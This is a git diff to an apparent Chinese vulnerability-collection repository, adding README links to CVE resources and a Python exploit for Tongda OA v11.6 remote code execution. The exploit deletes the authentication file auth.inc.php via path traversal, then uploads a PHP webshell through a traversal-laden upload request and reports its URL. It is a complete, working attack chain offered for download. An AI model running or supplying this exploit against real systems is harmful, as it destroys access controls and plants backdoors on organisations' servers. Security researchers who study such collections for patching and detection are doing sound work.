diff --git a/README.md b/README.md
index dfe2050..7ed06b7 100644
--- a/README.md
+++ b/README.md
@@ -146,8 +146,8 @@
 - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947)
 - [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md)
 - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
-- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)
-- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行]()
+- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py)
+- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug)
 - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
 - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/)
 - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260)
diff --git a/books/通达OAv11.6版本漏洞复现分析.pdf b/books/通达OAv11.6版本漏洞复现分析.pdf
new file mode 100644
index 0000000..b24c0df
Binary files /dev/null and b/books/通达OAv11.6版本漏洞复现分析.pdf differ
diff --git a/tools/通达OA_v11.6_RCE_EXP.py b/tools/通达OA_v11.6_RCE_EXP.py
new file mode 100644
index 0000000..6962c83
--- /dev/null
+++ b/tools/通达OA_v11.6_RCE_EXP.py
@@ -0,0 +1,32 @@ +import requests + +# 通达OA v11.6 RCE EXP +# 注意,会删除 auth.inc.php 文件,这个文件是判断用户是否登陆的文件,如果没有登陆就不能上传,所以把这个文件删掉就可以成功上传webshell了。 +target = "http://127.0.0.1:1234/" +payload = "" +print( + "[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA" +) +input("Press enter to continue") +print("[*]Deleting auth.inc.php....") +url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" +requests.get(url=url) +print("[*]Checking if file deleted...") +url = target + "/inc/auth.inc.php" +page = requests.get(url=url).text +if 'No input file specified.' not in page: + print("[-]Failed to deleted auth.inc.php") + exit(-1) +print("[+]Successfully deleted auth.inc.php!") +print("[*]Uploading payload...") +url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" +files = {'FILE1': ('deconf.php', payload)} +requests.post(url=url, files=files) +url = target + "/_deconf.php" +page = requests.get(url=url).text + +if 'No input file specified.' not in page: + print("[+]Filed Uploaded Successfully") + print("[+]URL:", url) +else: + print("[-]Failed to upload file")